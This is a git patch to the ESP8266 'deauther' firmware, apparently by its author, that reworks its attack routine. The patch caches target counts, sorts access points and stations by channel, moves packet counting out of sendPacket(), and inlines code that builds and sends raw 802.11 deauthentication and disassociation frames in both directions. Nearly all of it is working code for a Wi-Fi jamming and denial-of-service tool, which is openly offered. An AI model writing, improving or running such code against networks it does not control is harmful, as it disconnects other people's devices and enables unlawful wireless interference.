From e494d95c15e689edd8eff140015c2fd53191d3fd Mon Sep 17 00:00:00 2001 From: Stefan Kremser Date: Sun, 25 Mar 2018 10:26:55 +0200 Subject: [PATCH] Improved attack routine - less count() calls - fixed the deauth station crash (hopefully) - sort targets after channel for better performance - increment counter in deauth/beacon/probe function and not in sendPacket() that was stupid anyway --- esp8266_deauther/Attack.cpp | 91 +++++++++++++++++----------- esp8266_deauther/Attack.h | 18 +++--- esp8266_deauther/SerialInterface.cpp | 8 ++- esp8266_deauther/Stations.cpp | 8 +++ esp8266_deauther/Stations.h | 1 + 5 files changed, 82 insertions(+), 44 deletions(-) diff --git a/esp8266_deauther/Attack.cpp b/esp8266_deauther/Attack.cpp index 75baf97..33160de 100644 --- a/esp8266_deauther/Attack.cpp +++ b/esp8266_deauther/Attack.cpp @@ -23,7 +23,8 @@ void Attack::start() { prntln(A_START); attackTime = currentTime; attackStartTime = currentTime; - //accesspoints.sortAfterChannel(); + accesspoints.sortAfterChannel(); + stations.sortAfterChannel(); running = true; } @@ -41,6 +42,8 @@ void Attack::start(bool beacon, bool deauth, bool deauthAll, bool probe, bool ou start(); } else { prntln(A_NO_MODE_ERROR); + accesspoints.sort(); + stations.sort(); stop(); } } @@ -131,6 +134,10 @@ String Attack::getStatusJSON() { void Attack::update() { if (!running || scan.isScanning()) return; + apCount = accesspoints.count(); + stCount = stations.count(); + nCount = names.count(); + // run/update all attacks deauthUpdate(); deauthAllUpdate(); @@ -150,28 +157,28 @@ void Attack::deauthUpdate() { if (!deauthAll && deauth.active && deauth.maxPkts > 0 && deauth.packetCounter < deauth.maxPkts) { if (deauth.time <= currentTime - (1000 / deauth.maxPkts)) { // APs - if (accesspoints.count() > 0 && deauth.tc < accesspoints.count()) { + if (apCount > 0 && deauth.tc < apCount) { if (accesspoints.getSelected(deauth.tc)) { deauth.tc += deauthAP(deauth.tc); } else deauth.tc++; } // Stations - else if (stations.count() > 0 && deauth.tc >= accesspoints.count() && deauth.tc < stations.count() + accesspoints.count()) { - if (stations.getSelected(deauth.tc - accesspoints.count())) { - deauth.tc += deauthStation(deauth.tc - accesspoints.count()); + else if (stCount > 0 && deauth.tc >= apCount && deauth.tc < stCount + apCount) { + if (stations.getSelected(deauth.tc - apCount)) { + deauth.tc += deauthStation(deauth.tc - apCount); } else deauth.tc++; } // Names - else if (names.count() > 0 && deauth.tc >= accesspoints.count() + stations.count() && deauth.tc < names.count() + stations.count() + accesspoints.count()) { - if (names.getSelected(deauth.tc - stations.count() - accesspoints.count())) { - deauth.tc += deauthName(deauth.tc - stations.count() - accesspoints.count()); + else if (nCount > 0 && deauth.tc >= apCount + stCount && deauth.tc < nCount + stCount + apCount) { + if (names.getSelected(deauth.tc - stCount - apCount)) { + deauth.tc += deauthName(deauth.tc - stCount - apCount); } else deauth.tc++; } // reset counter - if (deauth.tc >= names.count() + stations.count() + accesspoints.count()) + if (deauth.tc >= nCount + stCount + apCount) deauth.tc = 0; } } @@ -181,7 +188,7 @@ void Attack::deauthAllUpdate() { if (deauthAll && deauth.active && deauth.maxPkts > 0 && deauth.packetCounter < deauth.maxPkts) { if (deauth.time <= currentTime - (1000 / deauth.maxPkts)) { // APs - if (accesspoints.count() > 0 && deauth.tc < accesspoints.count()) { + if (apCount > 0 && deauth.tc < apCount) { tmpID = names.findID(accesspoints.getMac(deauth.tc)); if (tmpID < 0) { deauth.tc += deauthAP(deauth.tc); @@ -191,24 +198,24 @@ void Attack::deauthAllUpdate() { } // Stations - else if (stations.count() > 0 && deauth.tc >= accesspoints.count() && deauth.tc < stations.count() + accesspoints.count()) { - tmpID = names.findID(stations.getMac(deauth.tc - accesspoints.count())); + else if (stCount > 0 && deauth.tc >= apCount && deauth.tc < stCount + apCount) { + tmpID = names.findID(stations.getMac(deauth.tc - apCount)); if (tmpID < 0) { - deauth.tc += deauthStation(deauth.tc - accesspoints.count()); + deauth.tc += deauthStation(deauth.tc - apCount); } else if (!names.getSelected(tmpID)) { - deauth.tc += deauthStation(deauth.tc - accesspoints.count()); + deauth.tc += deauthStation(deauth.tc - apCount); } else deauth.tc++; } // Names - else if (names.count() > 0 && deauth.tc >= accesspoints.count() + stations.count() && deauth.tc < accesspoints.count() + stations.count() + names.count()) { - if (!names.getSelected(deauth.tc - accesspoints.count() - stations.count())) { - deauth.tc += deauthName(deauth.tc - accesspoints.count() - stations.count()); + else if (nCount > 0 && deauth.tc >= apCount + stCount && deauth.tc < apCount + stCount + nCount) { + if (!names.getSelected(deauth.tc - apCount - stCount)) { + deauth.tc += deauthName(deauth.tc - apCount - stCount); } else deauth.tc++; } // reset counter - if (deauth.tc >= names.count() + stations.count() + accesspoints.count()) + if (deauth.tc >= nCount + stCount + apCount) deauth.tc = 0; } } @@ -233,15 +240,15 @@ void Attack:: beaconUpdate() { } } -bool Attack::deauthStation(uint8_t num) { +bool Attack::deauthStation(int num) { return deauthDevice(accesspoints.getMac(stations.getAP(num)), stations.getMac(num), settings.getDeauthReason(), accesspoints.getCh(stations.getAP(num))); } -bool Attack::deauthAP(uint8_t num) { +bool Attack::deauthAP(int num) { return deauthDevice(accesspoints.getMac(num), broadcast, settings.getDeauthReason(), accesspoints.getCh(num)); } -bool Attack::deauthName(uint8_t num) { +bool Attack::deauthName(int num) { if (names.isStation(num)) { return deauthDevice(names.getBssid(num), names.getMac(num), settings.getDeauthReason(), names.getCh(num)); } else { @@ -253,7 +260,7 @@ bool Attack::deauthDevice(uint8_t* apMac, uint8_t* stMac, uint8_t reason, uint8_ if (!stMac) return false; // exit when station mac is null //Serial.println("Deauthing "+macToStr(apMac)+" -> "+macToStr(stMac)); // for debugging - + bool success = false; // build deauth packet @@ -265,22 +272,36 @@ bool Attack::deauthDevice(uint8_t* apMac, uint8_t* stMac, uint8_t reason, uint8_ // send deauth frame deauthPacket[0] = 0xc0; - if (sendPacket(deauthPacket, packetSize, &deauth.packetCounter, ch, settings.getForcePackets())) + if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) success = true; // send disassociate frame deauthPacket[0] = 0xa0; - if (sendPacket(deauthPacket, packetSize, &deauth.packetCounter, ch, settings.getForcePackets())) + if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) success = true; - + // send another packet, this time from the station to the accesspoint if (!macBroadcast(stMac)) { // but only if the packet isn't a broadcast - if (deauthDevice(stMac, apMac, reason, ch)) { + // build deauth packet + memcpy(&deauthPacket[4], apMac, 6); + memcpy(&deauthPacket[10], stMac, 6); + memcpy(&deauthPacket[16], stMac, 6); + + // send deauth frame + deauthPacket[0] = 0xc0; + if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) + success = true; + + // send disassociate frame + deauthPacket[0] = 0xa0; + if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) success = true; - } } - if (success) deauth.time = currentTime; + if (success){ + deauth.time = currentTime; + deauth.packetCounter++; + } return success; } @@ -310,8 +331,9 @@ bool Attack::sendBeacon(uint8_t* mac, const char* ssid, uint8_t ch, bool wpa2) { beaconPacket[82] = ch; - if (sendPacket(beaconPacket, packetSize, &beacon.packetCounter, ch, settings.getForcePackets())) { + if (sendPacket(beaconPacket, packetSize, ch, settings.getForcePackets())) { beacon.time = currentTime; + beacon.packetCounter++; return true; } @@ -332,30 +354,29 @@ bool Attack::sendProbe(uint8_t* mac, const char* ssid, uint8_t ch) { memcpy(&probePacket[10], mac, 6); memcpy(&probePacket[26], ssid, ssidLen); - if (sendPacket(probePacket, packetSize, &probe.packetCounter, ch, settings.getForcePackets())) { + if (sendPacket(probePacket, packetSize, ch, settings.getForcePackets())) { probe.time = currentTime; + probe.packetCounter++; return true; } return false; } -bool Attack::sendPacket(uint8_t* packet, uint16_t packetSize, uint16_t* packetCounter, uint8_t ch, uint16_t tries) { +bool Attack::sendPacket(uint8_t* packet, uint16_t packetSize, uint8_t ch, uint16_t tries) { //Serial.println(bytesToStr(packet, packetSize)); // set channel setWifiChannel(ch); - + // sent out packet bool sent = wifi_send_pkt_freedom(packet, packetSize, 0) == 0; - + // try again until it's sent out for (int i = 0; i < tries && !sent; i++) { - yield(); sent = wifi_send_pkt_freedom(packet, packetSize, 0) == 0; } - if (sent) (*packetCounter)++; return sent; } diff --git a/esp8266_deauther/Attack.h b/esp8266_deauther/Attack.h index 8700bcc..32cbe2e 100644 --- a/esp8266_deauther/Attack.h +++ b/esp8266_deauther/Attack.h @@ -42,9 +42,9 @@ class Attack { void status(); String getStatusJSON(); - bool deauthAP(uint8_t num); - bool deauthStation(uint8_t num); - bool deauthName(uint8_t num); + bool deauthAP(int num); + bool deauthStation(int num); + bool deauthName(int num); bool deauthDevice(uint8_t* apMac, uint8_t* stMac, uint8_t reason, uint8_t ch); bool sendBeacon(uint8_t tc); @@ -53,7 +53,7 @@ class Attack { bool sendProbe(uint8_t tc); bool sendProbe(uint8_t* mac, const char* ssid, uint8_t ch); - bool sendPacket(uint8_t* packet, uint16_t packetSize, uint16_t* packetCounter, uint8_t ch, uint16_t tries); + bool sendPacket(uint8_t* packet, uint16_t packetSize, uint8_t ch, uint16_t tries); bool isRunning(); @@ -90,13 +90,17 @@ class Attack { uint32_t deauthPkts = 0; uint32_t beaconPkts = 0; uint32_t probePkts = 0; - - int8_t tmpID; + + uint8_t apCount = 0; + uint8_t stCount = 0; + uint8_t nCount = 0; + + int8_t tmpID = -1; uint16_t packetSize = 0; uint32_t attackTime = 0; // for counting how many packets per second uint32_t attackStartTime = 0; - uint32_t timeout; + uint32_t timeout = 0; // random mac address for making the beacon packets uint8_t mac[6] = {0xAA,0xBB,0xCC,0x00,0x11,0x22}; diff --git a/esp8266_deauther/SerialInterface.cpp b/esp8266_deauther/SerialInterface.cpp index 916980b..077a94b 100644 --- a/esp8266_deauther/SerialInterface.cpp +++ b/esp8266_deauther/SerialInterface.cpp @@ -889,8 +889,12 @@ void SerialInterface::runCommand(String input) { for (int i = 0; i < packetSize; i++) packet[i] = strtoul((packetStr.substring(i * 2, i * 2 + 2)).c_str(), NULL, 16); - if (attack.sendPacket(packet, packetSize, &counter, wifi_channel, 10)) prntln(CLI_CUSTOM_SENT); - else prntln(CLI_CUSTOM_FAILED); + if (attack.sendPacket(packet, packetSize, wifi_channel, 10)){ + prntln(CLI_CUSTOM_SENT); + counter++; + } else{ + prntln(CLI_CUSTOM_FAILED); + } } // ===== LED ===== // diff --git a/esp8266_deauther/Stations.cpp b/esp8266_deauther/Stations.cpp index ec1ecd9..56c4f11 100644 --- a/esp8266_deauther/Stations.cpp +++ b/esp8266_deauther/Stations.cpp @@ -35,6 +35,14 @@ void Stations::sort() { }); } +void Stations::sortAfterChannel() { + list->sort([](Station & a, Station & b) -> int{ + if (a.ch == b.ch) return 0; + if (a.ch < b.ch) return -1; + if (a.ch > b.ch) return 1; + }); +} + void Stations::removeAll() { internal_removeAll(); prntln(ST_CLEARED_LIST); diff --git a/esp8266_deauther/Stations.h b/esp8266_deauther/Stations.h index 89f445f..0a5d96b 100644 --- a/esp8266_deauther/Stations.h +++ b/esp8266_deauther/Stations.h @@ -27,6 +27,7 @@ class Stations { Stations(); void sort(); + void sortAfterChannel(); void select(int num); void deselect(int num);